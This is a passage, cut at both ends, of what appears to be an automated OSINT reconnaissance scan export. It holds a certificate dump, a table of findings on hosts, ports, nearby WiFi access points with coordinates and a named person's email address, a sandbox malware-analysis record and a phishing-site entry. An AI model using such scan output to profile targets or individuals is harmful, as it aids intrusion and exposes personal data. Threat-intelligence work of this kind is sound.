D9:CF:28:31:E6:B0:52:A6:B3:E5:82:F1:AF:FD:4B:16:99:CF:87:98
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nuke.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Feb 13 16:23:51.711 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:74:49:47:F4:26:47:0D:47:E2:9A:66:AF:
F3:3B:46:53:9D:6A:00:FC:C4:5B:6D:E9:3D:6A:E5:A3:
AC:D8:18:26:02:21:00:F0:DF:BE:68:08:A5:73:33:B8:
41:78:C8:F1:1D:97:89:D0:3C:53:99:EC:D3:37:A8:F1:
3C:4D:2D:2A:6D:AA:99
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Feb 13 16:23:51.724 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:C5:F1:D7:EC:63:EF:D2:2B:1D:83:7B:
83:54:8D:82:F0:09:7B:86:48:A1:52:8A:D7:9F:9A:A4:
8F:C9:E6:6D:A9:02:21:00:BF:BA:DA:57:96:9F:75:77:
05:96:B4:C2:FA:F6:06:66:B5:84:A9:CC:F1:BA:83:9B:
82:75:E0:63:24:71:36:67
Signature Algorithm: sha256WithRSAEncryption
85:63:54:da:d2:e7:1a:fb:ec:3f:3a:27:f7:a7:67:fe:c8:7b:
01:a2:64:e4:ee:ee:8e:f0:73:aa:5c:d0:77:bb:6f:be:12:26:
63:92:52:2b:90:c5:19:0c:01:d9:fb:68:bc:45:29:22:6d:35:
24:74:65:da:4b:43:d7:65:1a:2d:49:c6:90:fb:fd:df:39:3b:
cf:ed:9d:e1:a6:3d:3e:a0:05:2d:c4:03:55:00:85:97:89:e2:
1e:88:22:b2:ee:28:86:0f:c1:b8:e5:17:29:7c:e7:e3:6e:66:
99:6b:e8:89:3f:2e:a5:71:74:a0:b7:70:7a:4e:d4:b2:8a:69:
b1:f7:4b:20:bd:fb:7b:d5:07:9a:0c:c6:99:dd:4b:3f:c8:5e:
41:b1:8e:dd:2a:1a:39:aa:08:e2:1e:e6:e3:63:8f:d4:59:98:
ae:0a:7d:59:e3:fc:7d:a9:1f:51:9d:83:fc:16:e1:80:20:2f:
21:21:50:dd:de:43:12:b9:29:89:20:37:79:64:39:a0:00:fa:
b9:f2:d1:d6:97:d7:a4:ad:65:b2:7e:a9:68:2b:1e:77:25:f0:
a5:6a:9b:71:2e:77:c5:cb:51:1f:d8:52:be:f1:4f:2f:03:bf:
1b:74:58:57:b0:dc:c1:17:3e:44:8c:02:67:40:b6:b2:69:3c:
5b:81:25:af
|
| 2023-05-12 03:00:57 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 01.github.io | 185.199.111.153 |
| 2023-05-12 02:45:04 | Country | No | Country Name Extractor | 0 | 0 | 2 | 0 | None | British Indian Ocean Territory | github.io |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | RhodeNet (Net ID: 00:02:2D:0F:8E:DF) | 37.7642, -122.3993 |
| 2023-05-12 02:54:23 | Web Content | No | Web Spider | 0 | 0 | 4 | 0 | None | *{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131}html,button{font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,"Apple Color Emoji","Segoe UI Emoji",Segoe UI Symbol,"Noto Color Emoji"}body{display:flex;flex-direction:column;min-height:100vh}a{transition:color .15s ease;background-color:transparent;text-decoration:none;color:#0051c3}a:hover{text-decoration:underline;color:#ee730a}.hidden{display:none}.main-content{margin:8rem auto;width:100%;max-width:60rem}.heading-favicon{margin-right:.5rem;width:2rem;height:2rem}@media (max-width: 720px){.main-content{margin-top:4rem}.heading-favicon{width:1.5rem;height:1.5rem}}.main-content,.footer{padding-right:1.5rem;padding-left:1.5rem}.main-wrapper{display:flex;flex:1;flex-direction:column;align-items:center}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{line-height:3.75rem;font-size:2.5rem;font-weight:500}.h2{line-height:2.25rem;font-size:1.5rem;font-weight:500}.core-msg{line-height:2.25rem;font-size:1.5rem;font-weight:400}.body-text{line-height:1.25rem;font-size:1rem;font-weight:400}.expandable-title{line-height:1.5rem;font-weight:500}@media (max-width: 720px){.h1{line-height:1.75rem;font-size:1.5rem}.h2{line-height:1.5rem;font-size:1.25rem}.core-msg{line-height:1.5rem;font-size:1rem}}.icon-wrapper{display:inline-block;position:relative;top:.25rem;margin-right:.2rem}.heading-icon{width:1.625rem;height:1.625rem}@media (max-width: 720px){.heading-icon{width:1.25rem;height:1.25rem}}.warning-icon{display:inline-block;background-image:url(data:image/png;base64,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);background-size:cover}.text-center{text-align:center}.expandable{transition:height,border-left .2s;border-left:.125rem solid 
#e5e5e5;padding-left:.5rem}.expandable.expanded{border-left-color:#0051c3}.expandable-summary-btn{border:none;background:none;cursor:pointer;padding:0;color:inherit;font:inherit}.expandable-details{display:none;padding:.5rem 0}.expanded>.expandable-details{display:block}.caret-icon{display:inline-block;transition:transform .2s;background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgBAMAAACBVGfHAAAAElBMVEUAAAAwMDAxMTEyMjIwMDAxMTF+89HTAAAABXRSTlMAgF9/MMasjJIAAABTSURBVCjPzcq7DcAwDANR5TOAm/Rp0meErBAD3n8VW8DBt4JZUALxYp18vmfWUR2ed9TW7iB7K3muOsGfDRFAABKABCABSAASgAQgAUgAkhKLpwMJmwrD+BDiYwAAAABJRU5ErkJggg==);background-size:contain;width:1rem;height:1rem}.caret-icon-wrapper{position:relative;top:.1rem;margin-left:.2rem}.expanded .caret-icon{transform:rotate(180deg)}.big-button{transition-duration:.2s;transition-property:background-color,border-color,color;transition-timing-function:ease;border:.063rem solid #0051c3;border-radius:.313rem;padding:.375rem 1rem;line-height:1.313rem;font-size:.875rem}.big-button:hover{cursor:pointer}.captcha-prompt:not(.hidden){display:flex}@media (max-width: 720px){.captcha-prompt:not(.hidden){flex-wrap:wrap;justify-content:center}}.pow-button{margin:2rem 0;background-color:#0051c3;color:#fff}.pow-button:hover{border-color:#003681;background-color:#003681;color:#fff}.footer{margin:0 auto;width:100%;max-width:60rem;line-height:1.125rem;font-size:.75rem}.footer-inner{border-top:1px solid #d9d9d9;padding-top:1rem;padding-bottom:1rem}.ip-address{margin-left:2.25rem}.clearfix:after{display:table;clear:both;content:""}.clearfix .column{float:left;padding-right:1.5rem;width:50%}.diagnostic-wrapper{margin-bottom:.5rem}.footer .ray-id{text-align:center}.footer .ray-id code{font-family:monaco,courier,monospace}.core-msg,.zone-name-title{overflow-wrap:break-word}@media (max-width: 
720px){.diagnostic-wrapper{display:flex;flex-wrap:wrap;justify-content:center}.clearfix:after{display:initial;clear:none;text-align:center;content:none}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative;width:1.875rem;height:1.875rem}.lds-ring div{box-sizing:border-box;display:block;position:absolute;border:.3rem solid #595959;border-radius:50%;border-color:#595959 transparent transparent;width:1.875rem;height:1.875rem;animation:lds-ring 1.2s cubic-bezier(.5,0,.5,1) infinite}.lds-ring div:nth-child(1){animation-delay:-.45s}.lds-ring div:nth-child(2){animation-delay:-.3s}.lds-ring div:nth-child(3){animation-delay:-.15s}@keyframes lds-ring{0%{transform:rotate(0)}to{transform:rotate(360deg)}}@media screen and (-ms-high-contrast: active),screen and (-ms-high-contrast: none){body,.main-wrapper{display:block}}body.no-js .loading-spinner{visibility:hidden}body.no-js .challenge-running{display:none}@media (prefers-color-scheme: dark){body{background-color:#222;color:#d9d9d9}a{color:#fff}a:hover{text-decoration:underline;color:#ee730a}.lds-ring div{border-color:#999 transparent transparent}.font-red{color:#fc574a}.big-button,.pow-button{background-color:#4693ff;color:#1d1d1d}.expandable.expanded{border-left-color:#4693ff}}body.dark{background-color:#222;color:#d9d9d9}body.dark a{color:#fff}body.dark a:hover{text-decoration:underline;color:#ee730a}body.dark .lds-ring div{border-color:#999 transparent transparent}body.dark .font-red{color:#b20f03}body.dark .big-button,body.dark .pow-button{background-color:#4693ff;color:#1d1d1d}body.dark .expandable.expanded{border-left-color:#4693ff}body.light{background-color:transparent;color:#313131}body.light a{color:#0051c3}body.light a:hover{text-decoration:underline;color:#ee730a}body.light .lds-ring div{border-color:#595959 transparent transparent}body.light 
.font-red{color:#fc574a}body.light .big-button,body.light .pow-button{border-color:#003681;background-color:#003681;color:#fff}body.light .expandable.expanded{border-left-color:#0051c3} | https://www.ayhu.xyz/cdn-cgi/styles/challenges.css |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | message_me (Category: social)
https://mssg.me/login | login |
| 2023-05-12 02:54:51 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 404 Not Found
Server: Netlify
X-Nf-Request-Id: 01H06V19Y9J57EVG1E6053DPH4
Date: <REDACTED>
Content-Length: 0
| 34.74.170.74 |
| 2023-05-12 03:03:34 | Co-Hosted Site - Domain Name | No | DNS Resolver | 2 | 0 | 3 | 0 | None | 00ffcc.cn | 00ffcc.cn |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00cybermonk00.github.io | 185.199.111.153 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | MatrixEx BYOD (Net ID: 00:01:21:26:54:B1) | 41.8781, -87.6298 |
| 2023-05-12 02:59:57 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | sheila.christianson@ftb.ca.gov | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 23, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://www.bigmarker.com/taxadmin/The-Inbound-Customer-Experience?bmid=5673cc9137db&bmid_type=member', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\SM0:1480:304:WilStaging_02"\n "SM0:1480:304:WilStaging_02"\n "InternetShortcutMutex"\n "SM0:1480:120:WilError_01"\n "Local\\SM0:1480:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"3.235.65.215:443"\n "138.91.254.96:443"\n "13.227.21.136:443"\n "13.227.21.58:443"\n "13.227.74.64:443"\n "185.199.108.153:443"\n "74.125.137.157:443"\n "142.250.191.68:443"\n "151.101.2.137:443"\n "162.247.243.29:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, 
u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n "bam.nr-data.net"\n "checkout.stripe.com"\n "d1f74no97k6yi9.cloudfront.net"\n "d5ln38p3754yc.cloudfront.net"\n "js-agent.newrelic.com"\n "stats.g.doubleclick.net"\n "webrtc.github.io"\n "www.bigmarker.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string "<meta name="twitter:card" content="summary_large_image">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")\n Found string "<meta name="twitter:site" content="@bigmarker">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")\n Found string "<meta name="twitter:creator" content="@bigmarker">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")\n Found string "<meta name="twitter:title" content="The Inbound Customer Experience">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")\n Found string "<meta name="twitter:description" content="Our panelists will 
discuss a variety of questions including:" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member"), Found string "<meta name="twitter:image" content="https://d5ln38p3754yc.cloudfront.net/conference_icons/7821611/large/1677693079-c5b46aaa6c8ef248.jpg?1677693079">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""99centsubs.com"," 
(Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\index"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_0"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_1"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_2"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_3"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\history"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\autofill\\3.0.0.3\\edge_autofill_global_block_list.json"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\login data"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write 
files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\site characteristics database\\log"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\edgecoupons\\coupons_data.db\\log"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\sync data\\leveldb\\log"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\7c516a82-27f5-4723-be57-30a8336c14b5.tmp"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\service worker\\database\\log"'}, {u'category': u'Installation/Persistence', u'origin': u'File/Memory', u'identifier': u'string-396', u'name': u'Contains ability to create/modify Windows services (Powershell command string)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1543/003', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1543.003', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Found string "<div class="registrants-add-contents" style="padding-bottom: 28px">" (Indicator: "Add-Content"; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: 
[%TEMP%\\6236_1468670677\\shopping.js]- [targetUID: 00000000-00006236]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00001308]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\scoped_dir6236_1265273683\\Ruleset Data]- [targetUID: 00000000-0000623 |
| 2023-05-12 03:27:33 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.128:8080 | 188.114.96.0/24 |
| 2023-05-12 03:24:22 | Web Content Type | No | Web Spider | 0 | 0 | 4 | 0 | None | text/html;charset=utf-8 | https://ayhu.xyz/?__cf_chl_f_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA |
| 2023-05-12 03:10:03 | Affiliate - Domain Name | No | DNS Resolver | 2 | 0 | 5 | 0 | None | netcraft.com | baffin.netcraft.com |
| 2023-05-12 02:55:18 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | OpenBSD OpenSSH 8.9p1 | 46.101.229.70 |
| 2023-05-12 02:54:38 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5c82adbc7b2323-ORD
Content-Encoding: gzip
| 172.67.168.252 |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 4 | 0 | 2 | 0 | None | Cloudflare\, Inc. | C=US,ST=California,L=San Francisco,O=Cloudflare\, Inc.,CN=sni.cloudflaressl.com |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <no ssid> (Net ID: 00:00:C5:DB:8B:88) | 37.7642, -122.3993 |
| 2023-05-12 03:32:04 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.3:8443 | 188.114.97.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | BLINK-6985 (Net ID: 00:03:7F:A1:AE:79) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:23:19 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.5:8443 | 188.114.96.0/24 |
| 2023-05-12 02:54:03 | Netblock Membership | No | Censys | 0 | 0 | 2 | 0 | None | 172.67.128.0/20 | 172.67.135.9 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | laethof_ipad (Net ID: 00:0C:E6:08:02:05) | 50.8897, 6.0563 |
| 2023-05-12 02:45:32 | Raw Data from RIRs | No | PhishStats | 1 | 0 | 2 | 0 | None | [{u'page_text': None, u'domain': u'ecloanmoney.com', u'virus_total': u'Yes', u'n_times_seen_ip': 0, u'abuse_contact': u'abuse@ecloanmoney.com', u'ip': u'104.21.6.166', u'google_safebrowsing': u'Yes', u'threat_crowd': u'Yes', u'n_times_seen_domain': 0, u'alexa_rank_host': None, u'id': 8064681, u'city': u'', u'abuse_ch_malware': u'No', u'countrycode': u'US', u'title': u'Not Acceptable!', u'ssl_subject': None, u'technology': None, u'date_update': u'2022-01-16T13:03:33.000Z', u'zipcode': u'', u'alexa_rank_domain': None, u'score': 4.5, u'vulns': None, u'latitude': u'37.7510', u'regionname': u'', u'hash': u'16279a2e936344880462a47af65885b3a095b205bf036efd2e68751b3aa57f5b', u'threat_crowd_subdomain_count': 0, u'screenshot': None, u'n_times_seen_host': 0, u'ssl_issuer': None, u'domain_registered_n_days_ago': 399, u'regioncode': u'', u'host': u'ecloanmoney.com', u'date': u'2022-01-16T12:11:21.000Z', u'asn': u'AS13335', u'tags': u'cdn', u'bgp': u'104.16.0.0/12', u'url': u'https://ecloanmoney.com/dhl/card.php', u'isp': u'CLOUDFLARENET, US', u'longitude': u'-97.8220', u'ports': u'80, 443, 2086, 2087, 2096, 8080, 8443', u'countryname': u'United States', u'threat_crowd_votes': u'Suspicious', u'http_server': None, u'tld': u'com', u'os': None, u'http_code': 403}] | 104.21.6.166 |
| 2023-05-12 03:24:21 | Web Content | No | Web Spider | 2 | 0 | 4 | 0 | None | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f8c5a3bb81a1b')"></div>
<form id="challenge-form" action="/lol.html?__cf_chl_f_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="e35Zj8G5BDk9XldXhqgKMMl4m4jJjyX9hPpRt8lgb3o-1683861861-0-AeRvD12zRrpKT1Vj_NZpuXTYPY0T_C-IsEnAR9u2dCvcdsLy9Sv3iw7wV_fgwkqNl3iHxdj5qFwNZJL3xkB-iwW9vjUdMNxMyhnqv8JlscfNtie9SAcppGbOk7uCBiZIQLa1SBVNw6UUv-_a_FXFD2296FJ4KrNIS6arC6VFPDD30uM_354WVFgyW4mKtrSpYK5InwieJ1Vkv6ZxoCDhBRMhNxgPpigNP0QmWXw8y1_k8lflCwo_Q9K8uZ_qtQFf0Gfd14ZLuORqP0m48rgXZsNXk2d82Mm2SMemmjVviG7PuPUL1CbnB3WfSK2OQGeY4U-Gy7kSdq7i3_ymV00fkl4RBJdkPDOtsR2eeN44cG0QzvhUzJu9a18Wx-JBgeMkCDDp2c6FvebNEOQydvCZrys93XZSGdta0GBiBfCz0DM6AFXJXoguOORHg7MOd62eoxeeua6hY1HFOifFbgHz4R4_F4geEyT8xPiS9kLqmv-8Tv9wFT23J38aRv3VS8KGL7JX_pO7KJv7qjQiIN2XDIN1kP01EuKi5fpoFbmvumK_aQpspEPJd-oYkv6g3z8upJ_i8gMQOJzdPMV462qdkEt72KoSPvIxKpy4bKNXJwJjWy3MhsDm6o8-oFAI7dOznlN5m1idwbZgvsnclXbdkqJhXPQYzxjKdzlT7hyQKmtmMash-U3aTKSIpDEKkTstu-cs5rTf__9DuNB2pVPrKXIFuY7EwlrjB6j_0UJKavfBfT6h3NsKR3qKMg-rGVo2RSQdsEOud7Hh5F0cMs0nCAAWGTq86XwfC81O29W1K2i6OalWYJiW61x1Nv_qs72KoX0_Mpn3amoMA5KS1vGI6mPUPMiOwHSI0cRgqEERjtVjkE3-TwMesGkKvz-Aw2gGE9OL21frfN9JEzkR172OTICxrUfc7caDwzr9D9_NePtArl9cLDKFHEvxIxzgioPuODDLvyAfvi0dPWiWhMq7WkvCuoWovUiUA253wYEf7M9x4gD8lnc3kaUCBX9tFmIajIXhsaHhaKh_ysHvt7SDv4HQuHFmdW_PTHj46eP5odywpuZGDTSuWK7SWH7u71n7C_Ae4KUmVvgKAwroZ_dlv8I2ROpq-QoxjIwoWtmm2DsGljOITbn0msRXnKPyZMK8B7bxqx0Tk0lwfAxw5qFIfx9cKTkyEKNgMaJHKVRsdCxtQMpTYYbYCTs7ecYaFA-cfa8pDUJO-vS3eg6mjgEiRw-8bm1dPWtPUv2T1GYeSsTkWX7p26b8BfAn4XpyF65-516ZnQxFqk_LYA1aiczQzQWdLb1NuFpyAlTJVRij048j5uSY5WFvTrmsh7xjoZ2Z46DkwHtY4crfRZm3SD6Mg_03vOiI68rC6vzz6BqdsamaXqvoFcnUbGnDDjkCNPCk0I7LyG6AFbm_EwgFVB9gZOJPVWeWKxdCcEWIQQOyO_AqVnN-wyzH0S5fWbIjXusPp_qMzz38MsJyGlFbc7GOuh6S4SdpuQewqWPsqFDGHPGtQUEKXIDpP7weMLUYzqItqb4vPv3n4sxn1GsE-qNs3lpwxVrc1SL_ssnb3-_jfGgVSpkOmJliBGGmoH-AatJn35K3t_jno9HyCYJLmz1rZkbI33XoOACdRBNvladuDXSHE4m8J_n-NLMdDcqru4xU65kcr9OibRXR4hHHwc3rYYFV9kMj9KFuctQB10AWFL0_n3yW8Zlh4cik5rYLuGKboFr2i4pY9ykLSq7sms7Qe3oXXbRcmeWxKtL0NlB6gk_PWz-AAqtF3sr5sdva-7sRfyfrgrQxpiH5_wMb5DPqczx1O37xCMTLyF6YhMXn4ABmLQ-mt-EMWYX-tkGM85skgM2leXXJlv6HTAp-riDNoZ3OMVT4KeKIc6AIi8pOLxrJ9jD5o
